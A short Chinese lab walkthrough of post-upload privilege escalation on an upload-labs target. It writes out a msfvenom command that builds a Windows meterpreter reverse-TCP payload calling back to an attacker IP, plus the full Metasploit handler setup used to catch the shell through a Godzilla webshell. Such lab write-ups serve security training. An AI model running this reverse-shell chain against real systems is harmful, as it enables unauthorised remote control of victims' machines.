前言:
这几天做渗透成功通过任意文件上传漏洞拿下了某公司的webshell
但一般通过上传webshell拿到的权限不是很高,所以要进行提权操作。
环境:
靶机地址:192.168.71.132 搭建了upload-labs-maste,用uplod靶机作为目标进行渗透
攻击机地址:192.168.71.141(kali)
物理机地址:略
操作:
先在upload-labs-maste上传webshell,使用一句话木马即可。
(嘿嘿,upload-labs-maste第一关简单上传webshell不用发出来吧,直接发结果就好了)
用的是哥斯拉的马子,现在已经上传成功了,让我们用哥斯拉连接一下
我们的webshell已经成功了,那么让我们来试一下提权。
在kali中创建后门木马shell.exe,拖至物理机
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.71.141 lport=8881 -f exe -o shell.exe
开启监听
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
showo ptions
set lhost 192.168.71.141
set lport 8881
run
返回哥斯拉,点击上传文件,上传shell.exe
可以看到外面的文件已经上传到了靶机上了
执行shell.exe
start shell.exe
返回kali,已成功获取meterpreter权限
最后附上meterpreter提权的命令大全:
传送门